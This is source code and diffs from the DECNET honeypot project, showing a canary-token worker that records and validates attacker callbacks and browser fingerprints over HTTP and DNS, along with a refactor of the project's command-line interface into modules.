 from fastapi import FastAPI, Request, Response
 from decnet.bus import topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
 from decnet.canary.dns_server import CanaryDNSProtocol, DNSQuery
 from decnet.logging import get_logger
 from decnet.web.db.factory import get_repository
 from decnet.web.db.repository import BaseRepository
 log = get_logger("canary.worker")
 # 1×1 transparent GIF — public-domain canonical bytes.  Returning the
 # same image every time is fine: the body has no information the
 # attacker shouldn't see, and image clients cache it.
 _TRANSPARENT_GIF = bytes.fromhex(
    "47494638396101000100800100000000ffffff21f90401000001002c00000000010001000002024401003b"
 )
 # Namespace used by fingerprint generators to derive mint UUID.
 # Must stay in sync with fingerprint_html._MINT_NAMESPACE.
 _MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
 # In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
 # Maps (token_uuid, src_ip) -> list of monotonic timestamps.
 # Not shared across worker restarts or processes — acceptable for MVP.
 _FP_RATE_WINDOW_S = 60
 _FP_RATE_LIMIT = 30
 _fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
 def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
    key = (token_uuid, src_ip)
    now = time.monotonic()
    cutoff = now - _FP_RATE_WINDOW_S
    bucket = _fp_rate_buckets.get(key, [])
    bucket = [t for t in bucket if t > cutoff]
    if len(bucket) >= _FP_RATE_LIMIT:
        _fp_rate_buckets[key] = bucket
        return False
    bucket.append(now)
    _fp_rate_buckets[key] = bucket
    return True
 def _is_valid_fp_shape(fp: dict) -> bool:
    """Layer B — structural sanity check on a decoded fingerprint blob."""
    if not isinstance(fp.get("mint"), str) or not fp["mint"]:
        return False
    known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
    present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
    return present >= 3
 def _http_base() -> str:
    return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
 def _dns_zone() -> str:
    return os.environ.get("DECNET_CANARY_DNS_ZONE", "").strip(".").lower()
 def _http_port() -> int:
    return int(os.environ.get("DECNET_CANARY_HTTP_PORT", "8088"))
 def _dns_port() -> int:
    # Default 5353 (mDNS-ish, non-privileged) — operators pin :53 via
    # NAT or a CAP_NET_BIND_SERVICE-enabled unit.
    return int(os.environ.get("DECNET_CANARY_DNS_PORT", "5353"))
 def _dns_bind() -> str:
    return os.environ.get("DECNET_CANARY_DNS_BIND", "0.0.0.0")  # nosec B104 — attacker-facing decoy listener, internet exposure is the design
 def _http_bind() -> str:
    return os.environ.get("DECNET_CANARY_HTTP_BIND", "0.0.0.0")  # nosec B104 — same rationale
 # ---------------------------- HTTP surface --------------------------------
 def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
    """Construct the FastAPI app.
    Disables docs / openapi / redoc — operators query the canary
    surface via the *main* DECNET API, never directly.  Anyone hitting
    these paths is either misconfigured or scanning for a honeypot.
    """
    app = FastAPI(
        title="",  # don't leak "DECNET" in OpenAPI
        docs_url=None, redoc_url=None, openapi_url=None,
    )
    @app.middleware("http")
    async def _stealth_headers(request: Request, call_next):
        response: Response = await call_next(request)
        # Strip the uvicorn / starlette banner; replace with a
        # generic Server line that matches what most CDNs return.
        response.headers["Server"] = "nginx"
        # Don't leak request id / process id headers.
        if "x-process-time" in response.headers:
            del response.headers["x-process-time"]
        return response
    @app.get("/c/{slug}")
    async def callback(slug: str, request: Request) -> Response:
        raw_nonce = request.query_params.get("k")
        fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
        merged_headers = dict(request.headers)
        if fp_meta:
            merged_headers.update(fp_meta)
        await _record_hit(
            repo, bus,
            slug=slug,
            src_ip=_client_ip(request),
            user_agent=request.headers.get("user-agent"),
            request_path=str(request.url.path),
            dns_qname=None,
            raw_headers=merged_headers,
            parsed_fp=parsed_fp,
            raw_nonce=raw_nonce,
        )
        # Always 200 with a tiny image so the attacker's client sees
        # a "success" — same return regardless of whether the slug is
        # known. Stealth: do NOT distinguish unknown vs known via
        # status code or response body.
        return Response(content=_TRANSPARENT_GIF, media_type="image/gif")
    @app.get("/")
    async def root() -> Response:
        # Bare root returns a generic 404. The decoy posture: pretend
        # to be an empty static-file host that just happens to resolve
        # /c/<slug> when it matches.
        return Response(status_code=404)
    return app
 # Per-chunk size cap.  Real fingerprints fit in one ~3KB GET; honest
 # overflow is handled via chunking (s/i/n + d).  Anything larger than
 # this on a single request is junk, so we drop it instead of letting an
 # attacker inflate a trigger row indefinitely.
 _FP_CHUNK_MAX = 8 * 1024
 def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
    """Decode fingerprint-payload query params into (meta_dict, parsed_fp).
    The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
    * ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
    * ``?d=<b64url-json>`` — single-shot fingerprint dump.
    * ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
    Returns a tuple of:
    - ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
    - ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
      when there's no ``?d=`` or decoding fails.
    """
    out: dict[str, Any] = {}
    parsed_fp: Optional[dict] = None
    if not qp:
        return out, parsed_fp
    o = qp.get("o") if hasattr(qp, "get") else None
    if o:
        out["_fp_open"] = "1"
    d = qp.get("d") if hasattr(qp, "get") else None
    if not d:
        return out, parsed_fp
    if len(d) > _FP_CHUNK_MAX:
        out["_fp_oversize"] = "1"
        return out, parsed_fp
    sid = qp.get("s")
    idx = qp.get("i")
    total = qp.get("n")
    if sid and idx and total:
        out["_fp_sid"] = sid
        out["_fp_idx"] = idx
        out["_fp_total"] = total
        out["_fp_chunk"] = d
        return out, parsed_fp
    # Single-shot: decode and pass back as parsed_fp; validation runs in
    # _record_hit after token lookup so we have the stored nonce at hand.
    try:
        padded = d + "=" * (-len(d) % 4)
        raw = base64.urlsafe_b64decode(padded.encode("ascii"))
        parsed = json.loads(raw.decode("utf-8"))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        out["_fp_decode_error"] = "1"
        return out, parsed_fp
    if isinstance(parsed, dict):
        parsed_fp = parsed
    else:
        out["_fp_decode_error"] = "1"
    return out, parsed_fp
 def _client_ip(request: Request) -> str:
    # Honor X-Forwarded-For if the operator deployed behind a reverse
    # proxy. Take the leftmost address in the chain; everything after
    # is upstream-proxy noise.
    fwd = request.headers.get("x-forwarded-for")
    if fwd:
        return fwd.split(",", 1)[0].strip()
    if request.client:
        return request.client.host
    return "0.0.0.0"  # nosec B104 — sentinel for "unknown remote"
 # ---------------------------- shared persistence -------------------------
 async def _record_hit(
    repo: BaseRepository,
    bus: BaseBus,
    *,
    slug: str,
    src_ip: str,
    user_agent: Optional[str],
    request_path: Optional[str],
    dns_qname: Optional[str],
    raw_headers: Optional[dict],
    parsed_fp: Optional[dict] = None,
    raw_nonce: Optional[str] = None,
 ) -> None:
    """Resolve slug -> token, persist a trigger, publish on the bus.
    Unknown slugs are silently swallowed: returning the same response
    for known and unknown slugs is the stealth posture, and persisting
    every random scan would clutter the DB.
    When *parsed_fp* is present (single-shot fingerprint decode succeeded),
    it is validated through four layers before being merged into raw_headers:
    A) nonce match against CanaryToken.fingerprint_nonce,
    B) structural shape check,
    C) mint UUID consistency,
    D) per-(token, IP) rate limit.
    Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
    The trigger row always lands regardless — the GET hit is itself forensic.
    """
    token = await repo.get_canary_token_by_slug(slug)
    if token is None:
        return
    final_headers: dict[str, Any] = dict(raw_headers or {})
    if parsed_fp is not None:
        stored_nonce: Optional[str] = token.get("fingerprint_nonce")
        # Layer A — nonce
        if stored_nonce is not None and raw_nonce != stored_nonce:
            final_headers["_fp_invalid_nonce"] = "1"
            parsed_fp = None
        # Layer B — shape (only when nonce passed or no nonce enforced)
        if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
            final_headers["_fp_invalid_shape"] = "1"
            parsed_fp = None
        # Layer C — mint UUID consistency
        if parsed_fp is not None:
            expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
            if parsed_fp.get("mint") != expected_mint:
                final_headers["_fp_invalid_mint"] = "1"
                parsed_fp = None
        # Layer D — rate limit
        if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
            final_headers["_fp_rate_limited"] = "1"
            parsed_fp = None
        if parsed_fp is not None:
            final_headers["_fp"] = parsed_fp
    trigger_id = await repo.record_canary_trigger({
        "token_uuid": token["uuid"],
        "occurred_at": datetime.now(timezone.utc),
        "src_ip": src_ip,
        "user_agent": user_agent,
        "request_path": request_path,
        "dns_qname": dns_qname,
        "raw_headers": final_headers,
    })
    try:
        await bus.publish(
            topics.canary(token["uuid"], topics.CANARY_TRIGGERED),
            {
                "token_id": token["uuid"],
                "trigger_id": trigger_id,
                "decky_name": token["decky_name"],
                "src_ip": src_ip,
                "user_agent": user_agent,
                "request_path": request_path,
                "dns_qname": dns_qname,
            },
        )
    except Exception as e:  # noqa: BLE001 — best effort
        log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
    # Auto-deregister fingerprint canaries after the first valid fingerprint
    # is collected. Slug goes dark; the stealth posture means the attacker
    # sees the same 200 + GIF on the next hit — nothing reveals the revocation.
    # Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
    # http/dns canaries are NOT auto-revoked.
    if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
        try:
            await repo.update_canary_token_state(token["uuid"], "revoked")
            await bus.publish(
                topics.canary(token["uuid"], topics.CANARY_REVOKED),
                {"token_id": token["uuid"], "trigger_id": trigger_id,
                 "reason": "fingerprint_collected"},
            )
        except Exception as e:  # noqa: BLE001 — trigger row already landed; best effort
            log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
 # ---------------------------- DNS surface --------------------------------
 async def _start_dns_server(
    repo: BaseRepository, bus: BaseBus, *, loop: asyncio.AbstractEventLoop,
 ) -> Optional[asyncio.DatagramTransport]:
    zone = _dns_zone()
    if not zone:
        log.info("canary.dns disabled (DECNET_CANARY_DNS_ZONE unset)")
        return None
    async def _hook(slug: str, query: DNSQuery, src_ip: str) -> None:
        await _record_hit(
            repo, bus,
            slug=slug, src_ip=src_ip, user_agent=None,
            request_path=None, dns_qname=query.qname,
            raw_headers=None,
        )
    transport, _proto = await loop.create_datagram_endpoint(
        lambda: CanaryDNSProtocol(zone, _hook),
        local_addr=(_dns_bind(), _dns_port()),
    )
    log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
    return transport
 # ---------------------------- entry point --------------------------------
 async def run() -> None:
    """Worker entry point — kicked off by ``decnet canary``."""
    import uvicorn
    repo = get_repository()
    await repo.initialize()
    bus = get_bus()
    await bus.connect()
    app = _build_app(repo, bus)
    config = uvicorn.Config(
        app,
        host=_http_bind(),
        port=_http_port(),
        log_level="warning",
        access_log=False,  # stealth: no per-request lines
        server_header=False,  # we set Server: nginx in middleware
    )
    server = uvicorn.Server(config)
    loop = asyncio.get_running_loop()
    dns_transport = await _start_dns_server(repo, bus, loop=loop)
    try:
        await server.serve()
    finally:
        if dns_transport is not None:
            dns_transport.close()
        await bus.close()
 def main() -> None:
    """CLI entry point — synchronous wrapper for ``asyncio.run``."""
    asyncio.run(run())
--- a/decnet/cli.py
+++ b/decnet/cli.py
@@ -1,478 +0,0 @@
 """
 DECNET CLI — entry point for all commands.
 Usage:
  decnet deploy --mode unihost --deckies 5 --randomize-services
  decnet status
  decnet teardown [--all | --id decky-01]
  decnet services
 """
 import signal
 from typing import Optional
 import typer
 from rich.console import Console
 from rich.table import Table
 from decnet.env import (
    DECNET_API_HOST,
    DECNET_API_PORT,
    DECNET_INGEST_LOG_FILE,
    DECNET_WEB_HOST,
    DECNET_WEB_PORT,
 )
 from decnet.archetypes import Archetype, all_archetypes, get_archetype
 from decnet.config import (
    DecnetConfig,
 )
 from decnet.distros import all_distros, get_distro
 from decnet.fleet import all_service_names, build_deckies, build_deckies_from_ini
 from decnet.ini_loader import load_ini
 from decnet.network import detect_interface, detect_subnet, allocate_ips, get_host_ip
 from decnet.services.registry import all_services
 app = typer.Typer(
    name="decnet",
    help="Deploy a deception network of honeypot deckies on your LAN.",
    no_args_is_help=True,
 )
 console = Console()
 def _kill_api() -> None:
    """Find and kill any running DECNET API (uvicorn) or mutator processes."""
    import psutil
    import os
    _killed: bool = False
    for _proc in psutil.process_iter(['pid', 'name', 'cmdline']):
        try:
            _cmd = _proc.info['cmdline']
            if not _cmd:
                continue
            if "uvicorn" in _cmd and "decnet.web.api:app" in _cmd:
                console.print(f"[yellow]Stopping DECNET API (PID {_proc.info['pid']})...[/]")
                os.kill(_proc.info['pid'], signal.SIGTERM)
                _killed = True
            elif "decnet.cli" in _cmd and "mutate" in _cmd and "--watch" in _cmd:
                console.print(f"[yellow]Stopping DECNET Mutator Watcher (PID {_proc.info['pid']})...[/]")
                os.kill(_proc.info['pid'], signal.SIGTERM)
                _killed = True
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            continue
    if _killed:
        console.print("[green]Background processes stopped.[/]")
@app.command()
 def api(
    port: int = typer.Option(DECNET_API_PORT, "--port", help="Port for the backend API"),
    host: str = typer.Option(DECNET_API_HOST, "--host", help="Host IP for the backend API"),
    log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Path to the DECNET log file to monitor"),
 ) -> None:
    """Run the DECNET API and Web Dashboard in standalone mode."""
    import subprocess  # nosec B404
    import sys
    import os
    console.print(f"[green]Starting DECNET API on {host}:{port}...[/]")
    _env: dict[str, str] = os.environ.copy()
    _env["DECNET_INGEST_LOG_FILE"] = str(log_file)
    try:
        subprocess.run(  # nosec B603 B404
            [sys.executable, "-m", "uvicorn", "decnet.web.api:app", "--host", host, "--port", str(port)],
            env=_env
        )
    except KeyboardInterrupt:
        pass
    except (FileNotFoundError, subprocess.SubprocessError):
        console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
@app.command()
 def deploy(
    mode: str = typer.Option("unihost", "--mode", "-m", help="Deployment mode: unihost | swarm"),
    deckies: Optional[int] = typer.Option(None, "--deckies", "-n", help="Number of deckies to deploy (required without --config)", min=1),
    interface: Optional[str] = typer.Option(None, "--interface", "-i", help="Host NIC (auto-detected if omitted)"),
    subnet: Optional[str] = typer.Option(None, "--subnet", help="LAN subnet CIDR (auto-detected if omitted)"),
    ip_start: Optional[str] = typer.Option(None, "--ip-start", help="First decky IP (auto if omitted)"),
    services: Optional[str] = typer.Option(None, "--services", help="Comma-separated services, e.g. ssh,smb,rdp"),
    randomize_services: bool = typer.Option(False, "--randomize-services", help="Assign random services to each decky"),
    distro: Optional[str] = typer.Option(None, "--distro", help="Comma-separated distro slugs, e.g. debian,ubuntu22,rocky9"),
    randomize_distros: bool = typer.Option(False, "--randomize-distros", help="Assign a random distro to each decky"),
    log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Host path for the collector to write RFC 5424 logs (e.g. /var/log/decnet/decnet.log)"),
    archetype_name: Optional[str] = typer.Option(None, "--archetype", "-a", help="Machine archetype slug (e.g. linux-server, windows-workstation)"),
    mutate_interval: Optional[int] = typer.Option(30, "--mutate-interval", help="Automatically rotate services every N minutes"),
    dry_run: bool = typer.Option(False, "--dry-run", help="Generate compose file without starting containers"),
    no_cache: bool = typer.Option(False, "--no-cache", help="Force rebuild all images, ignoring Docker layer cache"),
    parallel: bool = typer.Option(False, "--parallel", help="Build all images concurrently (enables BuildKit, separates build from up)"),
    ipvlan: bool = typer.Option(False, "--ipvlan", help="Use IPvlan L2 instead of MACVLAN (required on WiFi interfaces)"),
    config_file: Optional[str] = typer.Option(None, "--config", "-c", help="Path to INI config file"),
    api: bool = typer.Option(False, "--api", help="Start the FastAPI backend to ingest and serve logs"),
    api_port: int = typer.Option(8000, "--api-port", help="Port for the backend API"),
 ) -> None:
    """Deploy deckies to the LAN."""
    import os
    if mode not in ("unihost", "swarm"):
        console.print("[red]--mode must be 'unihost' or 'swarm'[/]")
        raise typer.Exit(1)
    # ------------------------------------------------------------------ #
    # Config-file path                                                     #
    # ------------------------------------------------------------------ #
    if config_file:
        try:
            ini = load_ini(config_file)
        except FileNotFoundError as e:
            console.print(f"[red]{e}[/]")
            raise typer.Exit(1)
        iface = interface or ini.interface or detect_interface()
        subnet_cidr = subnet or ini.subnet
        effective_gateway = ini.gateway
        if subnet_cidr is None:
            subnet_cidr, effective_gateway = detect_subnet(iface)
        elif effective_gateway is None:
            _, effective_gateway = detect_subnet(iface)
        host_ip = get_host_ip(iface)
        console.print(f"[dim]Config:[/] {config_file}  [dim]Interface:[/] {iface}  "
                      f"[dim]Subnet:[/] {subnet_cidr}  [dim]Gateway:[/] {effective_gateway}  "
                      f"[dim]Host IP:[/] {host_ip}")
        if ini.custom_services:
            from decnet.custom_service import CustomService
            from decnet.services.registry import register_custom_service
            for cs in ini.custom_services:
                register_custom_service(
                    CustomService(
                        name=cs.name,
                        image=cs.image,
                        exec_cmd=cs.exec_cmd,
                        ports=cs.ports,
                    )
                )
        effective_log_file = log_file
        try:
            decky_configs = build_deckies_from_ini(
                ini, subnet_cidr, effective_gateway, host_ip, randomize_services, cli_mutate_interval=mutate_interval
            )
        except ValueError as e:
            console.print(f"[red]{e}[/]")
            raise typer.Exit(1)
    # ------------------------------------------------------------------ #
    # Classic CLI path                                                     #
    # ------------------------------------------------------------------ #
    else:
        if deckies is None:
            console.print("[red]--deckies is required when --config is not used.[/]")
            raise typer.Exit(1)
        services_list = [s.strip() for s in services.split(",")] if services else None
        if services_list:
            known = set(all_service_names())
            unknown = [s for s in services_list if s not in known]
            if unknown:
                console.print(f"[red]Unknown service(s): {unknown}. Available: {all_service_names()}[/]")
                raise typer.Exit(1)
        arch: Archetype | None = None
        if archetype_name:
            try:
                arch = get_archetype(archetype_name)
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
        if not services_list and not randomize_services and not arch:
            console.print("[red]Specify --services, --archetype, or --randomize-services.[/]")
            raise typer.Exit(1)
        iface = interface or detect_interface()
        if subnet is None:
            subnet_cidr, effective_gateway = detect_subnet(iface)
        else:
            subnet_cidr = subnet
            _, effective_gateway = detect_subnet(iface)
        host_ip = get_host_ip(iface)
        console.print(f"[dim]Interface:[/] {iface}  [dim]Subnet:[/] {subnet_cidr}  "
                      f"[dim]Gateway:[/] {effective_gateway}  [dim]Host IP:[/] {host_ip}")
        distros_list = [d.strip() for d in distro.split(",")] if distro else None
        if distros_list:
            try:
                for slug in distros_list:
                    get_distro(slug)
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
        ips = allocate_ips(subnet_cidr, effective_gateway, host_ip, deckies, ip_start)
        decky_configs = build_deckies(
            deckies, ips, services_list, randomize_services,
            distros_explicit=distros_list, randomize_distros=randomize_distros,
            archetype=arch, mutate_interval=mutate_interval,
        )
        effective_log_file = log_file
    if api and not effective_log_file:
        effective_log_file = os.path.join(os.getcwd(), "decnet.log")
        console.print(f"[cyan]API mode enabled: defaulting log-file to {effective_log_file}[/]")
    config = DecnetConfig(
        mode=mode,
        interface=iface,
        subnet=subnet_cidr,
        gateway=effective_gateway,
        deckies=decky_configs,
        log_file=effective_log_file,
        ipvlan=ipvlan,
        mutate_interval=mutate_interval,
    )
    from decnet.engine import deploy as _deploy
    _deploy(config, dry_run=dry_run, no_cache=no_cache, parallel=parallel)
    if mutate_interval is not None and not dry_run:
        import subprocess  # nosec B404
        import sys
        console.print(f"[green]Starting DECNET Mutator watcher in the background (interval: {mutate_interval}m)...[/]")
        try:
            subprocess.Popen(  # nosec B603
                [sys.executable, "-m", "decnet.cli", "mutate", "--watch"],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.STDOUT,
                start_new_session=True,
            )
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start mutator watcher.[/]")
    if effective_log_file and not dry_run and not api:
        import subprocess  # nosec B404
        import sys
        from pathlib import Path as _Path
        _collector_err = _Path(effective_log_file).with_suffix(".collector.log")
        console.print(f"[bold cyan]Starting log collector[/] → {effective_log_file}")
        subprocess.Popen(  # nosec B603
            [sys.executable, "-m", "decnet.cli", "collect", "--log-file", str(effective_log_file)],
            stdin=subprocess.DEVNULL,
            stdout=open(_collector_err, "a"),  # nosec B603
            stderr=subprocess.STDOUT,
            start_new_session=True,
        )
    if api and not dry_run:
        import subprocess  # nosec B404
        import sys
        console.print(f"[green]Starting DECNET API on port {api_port}...[/]")
        _env: dict[str, str] = os.environ.copy()
        _env["DECNET_INGEST_LOG_FILE"] = str(effective_log_file or "")
        try:
            subprocess.Popen(  # nosec B603
                [sys.executable, "-m", "uvicorn", "decnet.web.api:app", "--host", DECNET_API_HOST, "--port", str(api_port)],
                env=_env,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.STDOUT
            )
            console.print(f"[dim]API running at http://{DECNET_API_HOST}:{api_port}[/]")
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
@app.command()
 def collect(
    log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to write RFC 5424 syslog lines and .json records"),
 ) -> None:
    """Stream Docker logs from all running decky service containers to a log file."""
    import asyncio
    from decnet.collector import log_collector_worker
    console.print(f"[bold cyan]Collector starting[/] → {log_file}")
    asyncio.run(log_collector_worker(log_file))
@app.command()
 def mutate(
    watch: bool = typer.Option(False, "--watch", "-w", help="Run continuously and mutate deckies according to their interval"),
    decky_name: Optional[str] = typer.Option(None, "--decky", "-d", help="Force mutate a specific decky immediately"),
    force_all: bool = typer.Option(False, "--all", help="Force mutate all deckies immediately"),
 ) -> None:
    """Manually trigger or continuously watch for decky mutation."""
    import asyncio
    from decnet.mutator import mutate_decky, mutate_all, run_watch_loop
    from decnet.web.dependencies import repo
    async def _run() -> None:
        await repo.initialize()
        if watch:
            await run_watch_loop(repo)
        elif decky_name:
            await mutate_decky(decky_name, repo)
        elif force_all:
            await mutate_all(force=True, repo=repo)
        else:
            await mutate_all(force=False, repo=repo)
    asyncio.run(_run())
@app.command()
 def status() -> None:
    """Show running deckies and their status."""
    from decnet.engine import status as _status
    _status()
@app.command()
 def teardown(
    all_: bool = typer.Option(False, "--all", help="Tear down all deckies and remove network"),
    id_: Optional[str] = typer.Option(None, "--id", help="Tear down a specific decky by name"),
 ) -> None:
    """Stop and remove deckies."""
    if not all_ and not id_:
        console.print("[red]Specify --all or --id <name>.[/]")
        raise typer.Exit(1)
    from decnet.engine import teardown as _teardown
    _teardown(decky_id=id_)
    if all_:
        _kill_api()
@app.command(name="services")
 def list_services() -> None:
    """List all registered honeypot service plugins."""
    svcs = all_services()
    table = Table(title="Available Services", show_lines=True)
    table.add_column("Name", style="bold cyan")
    table.add_column("Ports")
    table.add_column("Image")
    for name, svc in sorted(svcs.items()):
        table.add_row(name, ", ".join(str(p) for p in svc.ports), svc.default_image)
    console.print(table)
@app.command(name="distros")
 def list_distros() -> None:
    """List all available OS distro profiles for deckies."""
    table = Table(title="Available Distro Profiles", show_lines=True)
    table.add_column("Slug", style="bold cyan")
    table.add_column("Display Name")
    table.add_column("Docker Image", style="dim")
    for slug, profile in sorted(all_distros().items()):
        table.add_row(slug, profile.display_name, profile.image)
    console.print(table)
@app.command(name="correlate")
 def correlate(
    log_file: Optional[str] = typer.Option(None, "--log-file", "-f", help="Path to DECNET syslog file to analyse"),
    min_deckies: int = typer.Option(2, "--min-deckies", "-m", help="Minimum number of distinct deckies an IP must touch to be reported"),
    output: str = typer.Option("table", "--output", "-o", help="Output format: table | json | syslog"),
    emit_syslog: bool = typer.Option(False, "--emit-syslog", help="Also print traversal events as RFC 5424 lines (for SIEM piping)"),
 ) -> None:
    """Analyse logs for cross-decky traversals and print the attacker movement graph."""
    import sys
    import json as _json
    from pathlib import Path
    from decnet.correlation.engine import CorrelationEngine
    engine = CorrelationEngine()
    if log_file:
        path = Path(log_file)
        if not path.exists():
            console.print(f"[red]Log file not found: {log_file}[/]")
            raise typer.Exit(1)
        engine.ingest_file(path)
    elif not sys.stdin.isatty():
        for line in sys.stdin:
            engine.ingest(line)
    else:
        console.print("[red]Provide --log-file or pipe log data via stdin.[/]")
        raise typer.Exit(1)
    traversals = engine.traversals(min_deckies)
    if output == "json":
        console.print_json(_json.dumps(engine.report_json(min_deckies), indent=2))
    elif output == "syslog":
        for line in engine.traversal_syslog_lines(min_deckies):
            typer.echo(line)
    else:
        if not traversals:
            console.print(
                f"[yellow]No traversals detected "
                f"(min_deckies={min_deckies}, events_indexed={engine.events_indexed}).[/]"
            )
        else:
            console.print(engine.report_table(min_deckies))
            console.print(
                f"[dim]Parsed {engine.lines_parsed} lines · "
                f"indexed {engine.events_indexed} events · "
                f"{len(engine.all_attackers())} unique IPs · "
                f"[bold]{len(traversals)}[/] traversal(s)[/]"
            )
    if emit_syslog:
        for line in engine.traversal_syslog_lines(min_deckies):
            typer.echo(line)
@app.command(name="archetypes")
 def list_archetypes() -> None:
    """List all machine archetype profiles."""
    table = Table(title="Machine Archetypes", show_lines=True)
    table.add_column("Slug", style="bold cyan")
    table.add_column("Display Name")
    table.add_column("Default Services", style="green")
    table.add_column("Description", style="dim")
    for slug, arch in sorted(all_archetypes().items()):
        table.add_row(
            slug,
            arch.display_name,
            ", ".join(arch.services),
            arch.description,
        )
    console.print(table)
@app.command(name="web")
 def serve_web(
    web_port: int = typer.Option(DECNET_WEB_PORT, "--web-port", help="Port to serve the DECNET Web Dashboard"),
    host: str = typer.Option(DECNET_WEB_HOST, "--host", help="Host IP to serve the Web Dashboard"),
 ) -> None:
    """Serve the DECNET Web Dashboard frontend."""
    import http.server
    import socketserver
    from pathlib import Path
    dist_dir = Path(__file__).parent.parent / "decnet_web" / "dist"
    if not dist_dir.exists():
        console.print(f"[red]Frontend build not found at {dist_dir}. Make sure you run 'npm run build' inside 'decnet_web'.[/]")
        raise typer.Exit(1)
    class SPAHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
        def do_GET(self):
            path = self.translate_path(self.path)
            if not Path(path).exists() or Path(path).is_dir():
                self.path = "/index.html"
            return super().do_GET()
    import os
    os.chdir(dist_dir)
    with socketserver.TCPServer((host, web_port), SPAHTTPRequestHandler) as httpd:
        console.print(f"[green]Serving DECNET Web Dashboard on http://{host}:{web_port}[/]")
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            console.print("\n[dim]Shutting down dashboard server.[/]")
 if __name__ == '__main__':  # pragma: no cover
    app()
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -0,0 +1,92 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """
 DECNET CLI — entry point for all commands.
 Usage:
  decnet deploy --mode unihost --deckies 5 --randomize-services
  decnet status
  decnet teardown [--all | --id decky-01]
  decnet services
 Layout: each command module exports ``register(app)`` which attaches its
 commands to the passed Typer app. ``__init__.py`` builds the root app,
 calls every module's ``register`` in order, then runs the master-only
 gate. The gate must fire LAST so it sees the fully-populated dispatch
 table before filtering.
 """
 from __future__ import annotations
 import typer
 from . import (
    agent,
    api,
    bus,
    canary,
    db,
    deploy,
    forwarder,
    geoip,
    init,
    inventory,
    lifecycle,
    listener,
    orchestrator,
    profiler,
    realism,
    reconciler,
    sniffer,
    swarm,
    swarmctl,
    topology,
    ttp,
    updater,
    web,
    webhook,
    workers,
 )
 from .gating import _gate_commands_by_mode
 from .utils import console as console, log as log
 app = typer.Typer(
    name="decnet",
    help="Deploy a deception network of honeypot deckies on your LAN.",
    no_args_is_help=True,
 )
 # Order matches the old flat layout so `decnet --help` reads the same.
 for _mod in (
    api, swarmctl, agent, updater, listener, forwarder,
    swarm,
    deploy, lifecycle, workers, inventory,
    web, profiler, orchestrator, realism, reconciler, sniffer, db,
    topology, bus, geoip, init, webhook, canary, ttp,
 ):
    _mod.register(app)
 _gate_commands_by_mode(app)
 # Backwards-compat re-exports. Tests and third-party tooling import these
 # directly from ``decnet.cli``; the refactor must keep them resolvable.
 from .db import _db_reset_mysql_async  # noqa: E402,F401
 from .gating import (  # noqa: E402,F401
    MASTER_ONLY_COMMANDS,
    MASTER_ONLY_GROUPS,
    _agent_mode_active,
    _require_master_mode,
 )
 from .utils import (  # noqa: E402,F401
    _daemonize,
    _http_request,
    _is_running,
    _kill_all_services,
    _pid_dir,
    _service_registry,
    _spawn_detached,
    _swarmctl_base_url,
 )
 if __name__ == "__main__":  # pragma: no cover
    app()
--- a/decnet/cli/agent.py
+++ b/decnet/cli/agent.py
@@ -0,0 +1,65 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import os
 import pathlib as _pathlib
 import sys as _sys
 from typing import Optional
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def agent(
        port: int = typer.Option(8765, "--port", help="Port for the worker agent"),
        host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the worker agent"),  # nosec B104
        agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker cert bundle dir (default: ~/.decnet/agent, expanded under the running user's HOME — set this when running as sudo/root)"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        no_forwarder: bool = typer.Option(False, "--no-forwarder", help="Do not auto-spawn the log forwarder alongside the agent"),
    ) -> None:
        """Run the DECNET SWARM worker agent (requires a cert bundle in ~/.decnet/agent/).
        By default, `decnet agent` auto-spawns `decnet forwarder` as a fully-
        detached sibling process so worker logs start flowing to the master
